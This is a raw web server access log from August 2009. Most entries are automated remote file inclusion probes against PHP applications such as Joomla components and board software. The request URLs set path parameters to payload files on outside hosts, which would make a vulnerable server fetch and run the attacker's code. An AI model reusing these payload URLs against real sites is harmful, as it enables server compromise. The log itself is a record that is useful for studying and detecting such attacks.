220.231.126.252 - - [03/Aug/2009:03:10:29 -0400] "GET /logs/access_log.Q109060800%20%20////?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:03:10:58 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
115.88.240.91 - - [03/Aug/2009:03:11:12 -0400] "GET /logs/access_log.Q109071900%20%20//include/lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
115.88.240.91 - - [03/Aug/2009:03:11:12 -0400] "GET /logs/access_log.Q109061700%20%20//include/lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
115.88.240.91 - - [03/Aug/2009:03:11:12 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
115.88.240.91 - - [03/Aug/2009:03:11:12 -0400] "GET //include/lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:03:11:16 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 200 12145 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:03:11:17 -0400] "GET /logs/error_log.Q109061400////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
115.88.240.91 - - [03/Aug/2009:03:11:34 -0400] "GET //include/lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
115.88.240.91 - - [03/Aug/2009:03:11:34 -0400] "GET /logs/access_log.Q109071900%20%20//include/lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
115.88.240.91 - - [03/Aug/2009:03:11:34 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
115.88.240.91 - - [03/Aug/2009:03:11:34 -0400] "GET /logs/access_log.Q109061700%20%20//include/lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.100.9.220 - - [03/Aug/2009:03:11:51 -0400] "GET /logs/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.100.9.220 - - [03/Aug/2009:03:11:51 -0400] "GET /logs/access_log.Q109051200/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.100.9.220 - - [03/Aug/2009:03:11:52 -0400] "GET /errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.100.9.220 - - [03/Aug/2009:03:11:55 -0400] "GET /logs/access_log.Q109050800/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.171.225.234 - - [03/Aug/2009:03:11:55 -0400] "GET /logs/access_log.Q109051600/administrator/components/com_virtuemart/errors.php?error=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
220.231.126.252 - - [03/Aug/2009:03:11:55 -0400] "GET /logs/access_log.Q109051300////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
213.171.225.234 - - [03/Aug/2009:03:11:56 -0400] "GET /administrator/components/com_virtuemart/errors.php?error=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
213.171.225.234 - - [03/Aug/2009:03:11:56 -0400] "GET /logs/administrator/components/com_virtuemart/errors.php?error=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
209.59.12.99 - - [03/Aug/2009:03:12:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [03/Aug/2009:03:12:28 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
88.2.221.29 - - [03/Aug/2009:03:12:30 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; es-es) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
88.2.221.29 - - [03/Aug/2009:03:12:30 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; es-es) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
190.144.44.36 - - [03/Aug/2009:03:12:41 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:13:34 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:13:34 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:13:34 -0400] "GET /logs/access_log.Q109061200%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:13:34 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
115.88.240.91 - - [03/Aug/2009:03:14:14 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
115.88.240.91 - - [03/Aug/2009:03:14:14 -0400] "GET /logs/access_log.Q109061700//include/lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
115.88.240.91 - - [03/Aug/2009:03:14:14 -0400] "GET /logs/access_log.Q109071900//include/lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
115.88.240.91 - - [03/Aug/2009:03:14:15 -0400] "GET //include/lib.inc.php?site_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
62.128.135.52 - - [03/Aug/2009:03:14:23 -0400] "GET //index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
216.120.237.150 - - [03/Aug/2009:03:14:26 -0400] "GET //index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
216.120.237.150 - - [03/Aug/2009:03:14:28 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
216.120.237.150 - - [03/Aug/2009:03:14:28 -0400] "GET //index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
216.120.237.150 - - [03/Aug/2009:03:14:28 -0400] "GET /logs//index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
77.221.130.15 - - [03/Aug/2009:03:14:31 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
77.221.130.15 - - [03/Aug/2009:03:14:32 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
213.171.225.234 - - [03/Aug/2009:03:14:37 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_virtuemart/errors.php?error=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
220.181.7.115 - - [03/Aug/2009:03:14:37 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
216.120.237.150 - - [03/Aug/2009:03:15:00 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
216.120.237.150 - - [03/Aug/2009:03:15:00 -0400] "GET //index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
216.120.237.150 - - [03/Aug/2009:03:15:00 -0400] "GET /logs//index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
62.128.135.52 - - [03/Aug/2009:03:15:07 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.128.135.52 - - [03/Aug/2009:03:15:07 -0400] "GET //index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
62.128.135.52 - - [03/Aug/2009:03:15:07 -0400] "GET /logs//index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
213.149.105.8 - - [03/Aug/2009:03:15:34 -0400] "GET /logs/access_log.Q109071500//bbs///skin/ggambo7002_board/comment_modify.php?dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
62.128.135.52 - - [03/Aug/2009:03:15:47 -0400] "GET //index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
216.120.237.150 - - [03/Aug/2009:03:16:13 -0400] "GET //index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
123.125.66.119 - - [03/Aug/2009:03:16:26 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
216.120.237.150 - - [03/Aug/2009:03:16:38 -0400] "GET /logs/access_log.Q109070900//index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
213.149.105.8 - - [03/Aug/2009:03:16:57 -0400] "GET /logs/administrator/components/errors.php?error=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:03:16:57 -0400] "GET /logs/access_log.Q109053100%20%20/administrator/components/errors.php?error=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
213.149.105.8 - - [03/Aug/2009:03:16:57 -0400] "GET /administrator/components/errors.php?error=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
213.171.225.234 - - [03/Aug/2009:03:17:00 -0400] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
213.171.225.234 - - [03/Aug/2009:03:17:00 -0400] "GET /administrator/components/errors.php?error=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
77.221.130.15 - - [03/Aug/2009:03:17:07 -0400] "GET /logs/access_log.Q109060500/index.php?pag=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
77.221.130.15 - - [03/Aug/2009:03:17:07 -0400] "GET /index.php?pag=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
77.221.130.15 - - [03/Aug/2009:03:17:08 -0400] "GET /logs/index.php?pag=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
209.59.12.99 - - [03/Aug/2009:03:17:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.149.105.8 - - [03/Aug/2009:03:17:31 -0400] "GET /logs/access_log.Q109070800%20%20/administrator/components/errors.php?error=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
62.128.135.52 - - [03/Aug/2009:03:17:35 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.128.135.52 - - [03/Aug/2009:03:17:35 -0400] "GET //index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
62.128.135.52 - - [03/Aug/2009:03:17:36 -0400] "GET /logs//index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
72.30.81.182 - - [03/Aug/2009:03:18:21 -0400] "GET /logs/access_log.Q109062500 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.120.237.150 - - [03/Aug/2009:03:18:31 -0400] "GET /logs/access_log.Q109070900//index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
62.128.135.52 - - [03/Aug/2009:03:18:45 -0400] "GET /logs/access_log.Q109051300//index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.128.135.52 - - [03/Aug/2009:03:19:03 -0400] "GET /logs/error_log.Q109070300//index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
216.120.237.150 - - [03/Aug/2009:03:19:37 -0400] "GET /logs/access_log.Q109071000//index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
216.120.237.150 - - [03/Aug/2009:03:19:37 -0400] "GET /logs/access_log.Q109071000//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
62.128.135.52 - - [03/Aug/2009:03:20:33 -0400] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
67.202.55.193 - - [03/Aug/2009:03:20:50 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
67.202.55.193 - - [03/Aug/2009:03:20:50 -0400] "GET /cgi-bin/LANSAWEB? HTTP/1.0" 408 514 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
212.124.37.50 - - [03/Aug/2009:03:21:02 -0400] "GET /logs/error_log.Q109072400//skin/zero_vote/error.php?dir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.813"
212.124.37.50 - - [03/Aug/2009:03:21:02 -0400] "GET //skin/zero_vote/error.php?dir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.813"
212.124.37.50 - - [03/Aug/2009:03:21:02 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.813"
212.124.37.50 - - [03/Aug/2009:03:21:14 -0400] "GET /logs/access_log.Q109072400//skin/zero_vote/error.php?dir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.813"
212.124.37.50 - - [03/Aug/2009:03:21:23 -0400] "GET /logs/access_log.Q109072400//skin/zero_vote/error.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:21:23 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:21:23 -0400] "GET //skin/zero_vote/error.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.174.63.122 - - [03/Aug/2009:03:21:48 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.174.63.122 - - [03/Aug/2009:03:21:48 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.174.63.122 - - [03/Aug/2009:03:21:48 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.174.63.122 - - [03/Aug/2009:03:21:48 -0400] "GET /logs/access_log.Q109061700//include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.30.81.182 - - [03/Aug/2009:03:21:24 -0400] "GET /logs/access_log.Q109070600 HTTP/1.0" 200 4677677 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.174.63.122 - - [03/Aug/2009:03:21:52 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.174.63.122 - - [03/Aug/2009:03:21:52 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.174.63.122 - - [03/Aug/2009:03:21:52 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.174.63.122 - - [03/Aug/2009:03:21:52 -0400] "GET /logs/access_log.Q109061700//include/admin.lib.inc.php?site_path=http://www.eecu.net/bbs/data/free/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.221.130.15 - - [03/Aug/2009:03:21:58 -0400] "GET /logs/access_log.Q109070500/index.php?pag=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
209.59.12.99 - - [03/Aug/2009:03:22:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.124.37.50 - - [03/Aug/2009:03:22:28 -0400] "GET //skin/zero_vote/error.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:22:28 -0400] "GET /logs/access_log.Q109072400//skin/zero_vote/error.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:22:28 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:22:28 -0400] "GET //skin/zero_vote/error.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:22:28 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:22:28 -0400] "GET /logs/access_log.Q109072400//skin/zero_vote/error.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:23:16 -0400] "GET /logs/error_log.Q109072400%20//skin/zero_vote/error.php?dir=http://artimagebazar.net//opr/admin/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.813"
220.231.126.252 - - [03/Aug/2009:03:23:50 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:03:23:50 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 200 12145 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:03:23:53 -0400] "GET /logs/error_log.Q109061700%20%20////?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:24:02 -0400] "GET /logs/access_log.Q109072400%20%20//skin/zero_vote/error.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:25:03 -0400] "GET /logs/access_log.Q109072400%20%20//skin/zero_vote/error.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
212.124.37.50 - - [03/Aug/2009:03:25:09 -0400] "GET /logs/access_log.Q109072400%20%20//skin/zero_vote/error.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.108.66.115 - - [03/Aug/2009:03:25:43 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.waawaa.com//Partner/order/readme.txt???? HTTP/1.1" 200 453 "-" "libwww-perl/5.812"
220.231.126.252 - - [03/Aug/2009:03:26:14 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
220.231.126.252 - - [03/Aug/2009:03:26:42 -0400] "GET /logs/error_log.Q109061700%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:03:27:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.108.66.115 - - [03/Aug/2009:03:28:51 -0400] "GET /logs/access_log.Q109072300///?_SERVER[DOCUMENT_ROOT]=http://www.waawaa.com//Partner/order/readme.txt???? HTTP/1.1" 404 227 "-" "libwww-perl/5.812"
89.108.66.115 - - [03/Aug/2009:03:28:51 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.waawaa.com//Partner/order/readme.txt???? HTTP/1.1" 200 453 "-" "libwww-perl/5.812"
89.108.66.115 - - [03/Aug/2009:03:28:51 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.waawaa.com//Partner/order/readme.txt???? HTTP/1.1" 200 12144 "-" "libwww-perl/5.812"
89.108.66.115 - - [03/Aug/2009:03:28:58 -0400] "GET /logs/access_log.Q109052500///?_SERVER[DOCUMENT_ROOT]=http://www.waawaa.com//Partner/order/readme.txt???? HTTP/1.1" 404 227 "-" "libwww-perl/5.812"
213.171.225.234 - - [03/Aug/2009:03:29:31 -0400] "GET /logs/access_log.Q109053100/administrator/components/errors.php?error=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
213.171.225.234 - - [03/Aug/2009:03:29:32 -0400] "GET /administrator/components/errors.php?error=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
213.171.225.234 - - [03/Aug/2009:03:29:32 -0400] "GET /logs/administrator/components/errors.php?error=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
213.171.225.234 - - [03/Aug/2009:03:30:01 -0400] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
213.171.225.234 - - [03/Aug/2009:03:30:09 -0400] "GET /logs/access_log.Q109070800/administrator/components/errors.php?error=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
212.124.37.50 - - [03/Aug/2009:03:31:02 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://www.omegagold.net//skin_shop/standard/2_view_body/fx29id1.TXT?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
